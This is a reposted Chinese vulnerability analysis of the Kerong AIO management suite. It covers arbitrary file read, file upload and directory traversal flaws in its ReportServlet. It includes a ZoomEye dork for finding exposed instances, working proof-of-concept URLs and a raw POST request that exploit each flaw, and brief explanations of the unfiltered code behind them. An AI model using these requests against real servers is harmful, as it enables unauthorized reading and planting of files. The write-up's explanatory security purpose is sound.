科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

admin 2023年12月27日23:10:33评论108 views字数 995阅读3分19秒阅读模式


免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责。


前言

科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP(进销存财务)、OAOA(办公⾃动化)、CRMCRM(客⼾关系管理)、UDPUDP(⾃定义平台),集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。

搜索引擎

ZoomEye: "changeAccount('8000')"

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

漏洞复现

新版本

任意文件读取

http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

代码分析

operation的值为getPicFile,将传入的fileName参数值进行判断是否以"/DISK"开头并且不为空,如果不为空并以"/DISK"开头进行截取如:/DISKC/Windows/Win.ini ==>DISKC/Windows/Win.ini,接着判断是否"DISK"开头,如果不为空并以"DISK"开头又进行截取然后拼接:DISKC/Windows/Win.ini==>C:/Windows/Win.ini最后进行文件读取下载。

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

老版本

任意文件上传

POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1Host: xxxxxxConnection: loseContent-Type: application/x-www-form-urlencodedContent-Length: 2
demo

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

代码分析

代码很直接获取POST输入流将内容写到指定fileName中,由于fileName未进行过滤导致可以进行越级上传。

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

目录遍历

http://xxxxxx/ReportServlet?operation=getFileList&path=../../../

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

代码分析

直接将path带入进行拼接然后遍历输出。

科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析




原文始发于微信公众号(渗透安全团队):科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月27日23:10:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   科荣 AIO任意文件上传/目录遍历/任意文件读取漏洞分析https://cn-sec.com/archives/2338524.html

发表评论

匿名网友 填写信息